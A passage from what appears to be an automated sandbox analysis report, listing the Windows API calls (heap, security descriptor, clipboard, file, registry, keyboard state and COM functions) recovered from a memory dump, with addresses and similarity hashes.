                                                                                                        • Part of subcall function 00D71989: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00D7142B,?,?,?), ref: 00D719BF
                                                                                                        • Part of subcall function 00D71989: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00D7142B,?,?,?), ref: 00D719C6
                                                                                                        • Part of subcall function 00D71989: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00D719DD
                                                                                                      • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00D7145C
                                                                                                      • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00D71490
                                                                                                      • GetLengthSid.ADVAPI32(?), ref: 00D714A7
                                                                                                      • GetAce.ADVAPI32(?,00000000,?), ref: 00D714E1
                                                                                                      • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00D714FD
                                                                                                      • GetLengthSid.ADVAPI32(?), ref: 00D71514
                                                                                                      • GetProcessHeap.KERNEL32(00000008,00000008), ref: 00D7151C
                                                                                                      • HeapAlloc.KERNEL32(00000000), ref: 00D71523
                                                                                                      • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00D71544
                                                                                                      • CopySid.ADVAPI32(00000000), ref: 00D7154B
                                                                                                      • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00D7157A
                                                                                                      • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00D7159C
                                                                                                      • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00D715AE
                                                                                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00D715D5
                                                                                                      • HeapFree.KERNEL32(00000000), ref: 00D715DC
                                                                                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00D715E5
                                                                                                      • HeapFree.KERNEL32(00000000), ref: 00D715EC
                                                                                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00D715F5
                                                                                                      • HeapFree.KERNEL32(00000000), ref: 00D715FC
                                                                                                      • GetProcessHeap.KERNEL32(00000000,?), ref: 00D71608
                                                                                                      • HeapFree.KERNEL32(00000000), ref: 00D7160F
                                                                                                        • Part of subcall function 00D71A23: GetProcessHeap.KERNEL32(00000008,00D71441,?,00000000,?,00D71441,?), ref: 00D71A31
                                                                                                        • Part of subcall function 00D71A23: HeapAlloc.KERNEL32(00000000,?,00000000,?,00D71441,?), ref: 00D71A38
                                                                                                        • Part of subcall function 00D71A23: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00D71441,?), ref: 00D71A47
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                                                                      • String ID:
                                                                                                      • API String ID: 4175595110-0
                                                                                                      • Opcode ID: edadde45f8bf0e61534896bc06fb36ec66a4e4223cf2e505110b3cfd57e31758
                                                                                                      • Instruction ID: 34e2c5978b1991b17c8de6a354a31a96da9d73f4f7ef2896a2cc1c5ee43b5f46
                                                                                                      • Opcode Fuzzy Hash: edadde45f8bf0e61534896bc06fb36ec66a4e4223cf2e505110b3cfd57e31758
                                                                                                      • Instruction Fuzzy Hash: A471307590020AABDF10DFA9DC45FEEBBB9FF45310F188215E91AE6290E7719A05CB70
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • OpenClipboard.USER32(00DADCD0), ref: 00D8F486
                                                                                                      • IsClipboardFormatAvailable.USER32(0000000D), ref: 00D8F494
                                                                                                      • GetClipboardData.USER32(0000000D), ref: 00D8F4A0
                                                                                                      • CloseClipboard.USER32 ref: 00D8F4AC
                                                                                                      • GlobalLock.KERNEL32(00000000), ref: 00D8F4E4
                                                                                                      • CloseClipboard.USER32 ref: 00D8F4EE
                                                                                                      • GlobalUnlock.KERNEL32(00000000,00000000), ref: 00D8F519
                                                                                                      • IsClipboardFormatAvailable.USER32(00000001), ref: 00D8F526
                                                                                                      • GetClipboardData.USER32(00000001), ref: 00D8F52E
                                                                                                      • GlobalLock.KERNEL32(00000000), ref: 00D8F53F
                                                                                                      • GlobalUnlock.KERNEL32(00000000,?), ref: 00D8F57F
                                                                                                      • IsClipboardFormatAvailable.USER32(0000000F), ref: 00D8F595
                                                                                                      • GetClipboardData.USER32(0000000F), ref: 00D8F5A1
                                                                                                      • GlobalLock.KERNEL32(00000000), ref: 00D8F5B2
                                                                                                      • DragQueryFileW.SHELL32(00000000,000000FF,00000000,00000000), ref: 00D8F5D4
                                                                                                      • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 00D8F5F1
                                                                                                      • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 00D8F62F
                                                                                                      • GlobalUnlock.KERNEL32(00000000,?,?), ref: 00D8F650
                                                                                                      • CountClipboardFormats.USER32 ref: 00D8F671
                                                                                                      • CloseClipboard.USER32 ref: 00D8F6B6
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Clipboard$Global$AvailableCloseDataDragFileFormatLockQueryUnlock$CountFormatsOpen
                                                                                                      • String ID:
                                                                                                      • API String ID: 420908878-0
                                                                                                      • Opcode ID: 43802fb1e53705bf6863baffe6e17794a8f598dd25f690384ac187a2465dd465
                                                                                                      • Instruction ID: e7d245cb1e8038dc2ae919e438ebd59e85220164ae981f9d341b2330edbd609e
                                                                                                      • Opcode Fuzzy Hash: 43802fb1e53705bf6863baffe6e17794a8f598dd25f690384ac187a2465dd465
                                                                                                      • Instruction Fuzzy Hash: 06618A31204306AFD310FF24E885FAA7BA5EF85714F184569F486C76A2DB31E946CB72
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • FindFirstFileW.KERNEL32(?,?), ref: 00D87318
                                                                                                      • FindClose.KERNEL32(00000000), ref: 00D8736C
                                                                                                      • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00D873A8
                                                                                                      • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00D873CF
                                                                                                        • Part of subcall function 00D1B25F: _wcslen.LIBCMT ref: 00D1B269
                                                                                                      • FileTimeToSystemTime.KERNEL32(?,?), ref: 00D8740C
                                                                                                      • FileTimeToSystemTime.KERNEL32(?,?), ref: 00D87439
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Time$File$FindLocalSystem$CloseFirst_wcslen
                                                                                                      • String ID: %02d$%03d$%4d$%4d%02d%02d%02d%02d%02d$%4d%02d%02d%02d%02d%02d%03d
                                                                                                      • API String ID: 3830820486-3289030164
                                                                                                      • Opcode ID: cd354fc2b2eeafefbcce9fb4e914c7a810f3f8f59d006bcfd1163ecd5e435c54
                                                                                                      • Instruction ID: e242eca81eb35c05063b7319a12ca3229b7b4f2307db6e9e01d98abd5d12992b
                                                                                                      • Opcode Fuzzy Hash: cd354fc2b2eeafefbcce9fb4e914c7a810f3f8f59d006bcfd1163ecd5e435c54
                                                                                                      • Instruction Fuzzy Hash: A0D12DB2508344AFC314EB64D881EAFB7ECEF98704F44491AF585D6291EB74D948CB72
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 00D89FC0
                                                                                                      • GetFileAttributesW.KERNEL32(?), ref: 00D89FFE
                                                                                                      • SetFileAttributesW.KERNEL32(?,?), ref: 00D8A018
                                                                                                      • FindNextFileW.KERNEL32(00000000,?), ref: 00D8A030
                                                                                                      • FindClose.KERNEL32(00000000), ref: 00D8A03B
                                                                                                      • FindFirstFileW.KERNEL32(*.*,?), ref: 00D8A057
                                                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00D8A0A7
                                                                                                      • SetCurrentDirectoryW.KERNEL32(00DD7B94), ref: 00D8A0C5
                                                                                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 00D8A0CF
                                                                                                      • FindClose.KERNEL32(00000000), ref: 00D8A0DC
                                                                                                      • FindClose.KERNEL32(00000000), ref: 00D8A0EC
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                                                                                                      • String ID: *.*
                                                                                                      • API String ID: 1409584000-438819550
                                                                                                      • Opcode ID: dd60ef6a320ea76f8a9a6895515ee0c7595857ae8953fbfff11a21a3c6843778
                                                                                                      • Instruction ID: c55e96e946b83c2be8fd732df9f23bff2e4b99a83f8bb04399ff0fc6840d43d2
                                                                                                      • Opcode Fuzzy Hash: dd60ef6a320ea76f8a9a6895515ee0c7595857ae8953fbfff11a21a3c6843778
                                                                                                      • Instruction Fuzzy Hash: 3E31A3326017196FEB10AFB8DC49AEE73ADAF09360F144196E416E2190EB74DE44CB75
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00D8469A
                                                                                                      • _wcslen.LIBCMT ref: 00D846C7
                                                                                                      • CreateDirectoryW.KERNEL32(?,00000000), ref: 00D846F7
                                                                                                      • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00D84718
                                                                                                      • RemoveDirectoryW.KERNEL32(?), ref: 00D84728
                                                                                                      • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00D847AF
                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 00D847BA
                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 00D847C5
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove_wcslen
                                                                                                      • String ID: :$\$\??\%s
                                                                                                      • API String ID: 1149970189-3457252023
                                                                                                      • Opcode ID: 6f8d24bb1022a81398cd545a871d25bf316199870970e6d832370b417ad592e7
                                                                                                      • Instruction ID: 8be69c3f01395a8e77bfacfdfbd1f1728a7dd131e3f38f6866ac5fdcbfb40af9
                                                                                                      • Opcode Fuzzy Hash: 6f8d24bb1022a81398cd545a871d25bf316199870970e6d832370b417ad592e7
                                                                                                      • Instruction Fuzzy Hash: A731D27190021AABDB21AFA0DC45FEB37BDEF8A740F1000B5F60AD2160E77496448B74
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 00D8A11B
                                                                                                      • FindNextFileW.KERNEL32(00000000,?), ref: 00D8A176
                                                                                                      • FindClose.KERNEL32(00000000), ref: 00D8A181
                                                                                                      • FindFirstFileW.KERNEL32(*.*,?), ref: 00D8A19D
                                                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00D8A1ED
                                                                                                      • SetCurrentDirectoryW.KERNEL32(00DD7B94), ref: 00D8A20B
                                                                                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 00D8A215
                                                                                                      • FindClose.KERNEL32(00000000), ref: 00D8A222
                                                                                                      • FindClose.KERNEL32(00000000), ref: 00D8A232
                                                                                                        • Part of subcall function 00D7E2AE: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00D7E2C9
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                                                                                                      • String ID: *.*
                                                                                                      • API String ID: 2640511053-438819550
                                                                                                      • Opcode ID: a4e451724903c3c0082d56836b4a9a14d72ce50ebfc2b96e1e342dcfe498276a
                                                                                                      • Instruction ID: 256ad1fc4ee9b1e5109cf34ca00fa007ee62c131421be09d86df20448f95fc5b
                                                                                                      • Opcode Fuzzy Hash: a4e451724903c3c0082d56836b4a9a14d72ce50ebfc2b96e1e342dcfe498276a
                                                                                                      • Instruction Fuzzy Hash: 0631A2315013196EEF20BFA8EC49BDE77AD9F0A320F144193E811E21A1EB71DA85CB75
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                        • Part of subcall function 00D9D2F7: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00D9C00D,?,?), ref: 00D9D314
                                                                                                        • Part of subcall function 00D9D2F7: _wcslen.LIBCMT ref: 00D9D350
                                                                                                        • Part of subcall function 00D9D2F7: _wcslen.LIBCMT ref: 00D9D3C7
                                                                                                        • Part of subcall function 00D9D2F7: _wcslen.LIBCMT ref: 00D9D3FD
                                                                                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00D9C89D
                                                                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?), ref: 00D9C908
                                                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 00D9C92C
                                                                                                      • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00D9C98B
                                                                                                      • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 00D9CA46
                                                                                                      • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 00D9CAB3
                                                                                                      • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 00D9CB48
                                                                                                      • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,00000000,?,?,?,00000000), ref: 00D9CB99
                                                                                                      • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 00D9CC42
                                                                                                      • RegCloseKey.ADVAPI32(?,?,00000000), ref: 00D9CCE1
                                                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 00D9CCEE
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: QueryValue$Close_wcslen$BuffCharConnectOpenRegistryUpper
                                                                                                      • String ID:
                                                                                                      • API String ID: 3102970594-0
                                                                                                      • Opcode ID: 2931d027fdbaa1207bf231624d9c3450c7c499615dcab0705e4285dd9cccc2cf
                                                                                                      • Instruction ID: f5378438f40cdde187794962635810501e08ac491aef36aad48cb4c5600791c5
                                                                                                      • Opcode Fuzzy Hash: 2931d027fdbaa1207bf231624d9c3450c7c499615dcab0705e4285dd9cccc2cf
                                                                                                      • Instruction Fuzzy Hash: AB024271614200AFDB14DF24C895E2ABBE5EF49314F18849DF84ACB2A6DB31ED45CBB1
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • GetKeyboardState.USER32(?), ref: 00D7A572
                                                                                                      • GetAsyncKeyState.USER32(000000A0), ref: 00D7A5F3
                                                                                                      • GetKeyState.USER32(000000A0), ref: 00D7A60E
                                                                                                      • GetAsyncKeyState.USER32(000000A1), ref: 00D7A628
                                                                                                      • GetKeyState.USER32(000000A1), ref: 00D7A63D
                                                                                                      • GetAsyncKeyState.USER32(00000011), ref: 00D7A655
                                                                                                      • GetKeyState.USER32(00000011), ref: 00D7A667
                                                                                                      • GetAsyncKeyState.USER32(00000012), ref: 00D7A67F
                                                                                                      • GetKeyState.USER32(00000012), ref: 00D7A691
                                                                                                      • GetAsyncKeyState.USER32(0000005B), ref: 00D7A6A9
                                                                                                      • GetKeyState.USER32(0000005B), ref: 00D7A6BB
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: State$Async$Keyboard
                                                                                                      • String ID:
                                                                                                      • API String ID: 541375521-0
                                                                                                      • Opcode ID: 273d5f0e1043c1be398b862beed421c3e2a61f147661852688e6e4fd6b7f6ca5
                                                                                                      • Instruction ID: a3cc1cb2c17a337f9deda6c334ca7daacfb48d108f31c86ef0c01659baa121fc
                                                                                                      • Opcode Fuzzy Hash: 273d5f0e1043c1be398b862beed421c3e2a61f147661852688e6e4fd6b7f6ca5
                                                                                                      • Instruction Fuzzy Hash: 4841B670904BC96EFF35876884043ADBEA16B96344F0CC05AD5CA4A6C1FB949DC4CB73
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • CoInitialize.OLE32 ref: 00D940D1
                                                                                                      • CoUninitialize.OLE32 ref: 00D940DC
                                                                                                      • CoCreateInstance.OLE32(?,00000000,00000017,00DB0B44,?), ref: 00D94136
                                                                                                      • IIDFromString.OLE32(?,?), ref: 00D941A9
                                                                                                      • VariantInit.OLEAUT32(?), ref: 00D94241
                                                                                                      • VariantClear.OLEAUT32(?), ref: 00D94293
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize
                                                                                                      • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                                                      • API String ID: 636576611-1287834457
                                                                                                      • Opcode ID: 54201d863c9e3f710991440563047dea70e591a3dcc55562651e7b2fce224916
                                                                                                      • Instruction ID: 742ecc2ad01e4f9756ee2d6e24a13519dd5344db229125af023dccc3450c70e1
                                                                                                      • Opcode Fuzzy Hash: 54201d863c9e3f710991440563047dea70e591a3dcc55562651e7b2fce224916
                                                                                                      • Instruction Fuzzy Hash: 1D61A0706043019FCB10DF64D848F6ABBE4EF49714F04080AF985AB292D770ED89CBB6
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                        • Part of subcall function 00D1557E: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00D15558,?,?,00D54B50,?,?,00000100,00000000,00000000,CMDLINE), ref: 00D1559E
                                                                                                        • Part of subcall function 00D7E9C5: GetFileAttributesW.KERNEL32(?,00D7D755), ref: 00D7E9C6
                                                                                                      • FindFirstFileW.KERNEL32(?,?), ref: 00D7D8E2
                                                                                                      • DeleteFileW.KERNEL32(?,?,?,?,?,00000000,?,?,?), ref: 00D7D99D
                                                                                                      • MoveFileW.KERNEL32(?,?), ref: 00D7D9B0
                                                                                                      • DeleteFileW.KERNEL32(?,?,?,?), ref: 00D7D9CD
                                                                                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 00D7D9F7
                                                                                                        • Part of subcall function 00D7DA5C: CopyFileExW.KERNEL32(?,?,00000000,00000000,00000000,00000008,?,?,00D7D9DC,?,?), ref: 00D7DA72
                                                                                                      • FindClose.KERNEL32(00000000,?,?,?), ref: 00D7DA13
                                                                                                      • FindClose.KERNEL32(00000000), ref: 00D7DA24
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: File$Find$CloseDelete$AttributesCopyFirstFullMoveNameNextPath
                                                                                                      • String ID: \*.*
                                                                                                      • API String ID: 1946585618-1173974218
                                                                                                      • Opcode ID: 1ab9155be7b1fb559c7cc1660c8a2efaf9ba154d3b40a85c68322fb4d2c81fcd
                                                                                                      • Instruction ID: fe8664c9c22cc07807bf8bc6abad059b30e8f5ae28eaacaa06245fdbfea7d623
                                                                                                      • Opcode Fuzzy Hash: 1ab9155be7b1fb559c7cc1660c8a2efaf9ba154d3b40a85c68322fb4d2c81fcd
                                                                                                      • Instruction Fuzzy Hash: 41614C3180114DAACF05EBE0E942AEDB7B6EF15300F2480A6E446B61A1EF319F49CB71
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                                                      • String ID:
                                                                                                      • API String ID: 1737998785-0
                                                                                                      • Opcode ID: ce8880fd516d6c5c94bfc39c6a33203c7354346f1cf4c9f47434a8da7814d55b
                                                                                                      • Instruction ID: 3f67ee23c2ad5602a219838e250f9c4233971a787816a2d6a0fd1c82c9eed958
                                                                                                      • Opcode Fuzzy Hash: ce8880fd516d6c5c94bfc39c6a33203c7354346f1cf4c9f47434a8da7814d55b
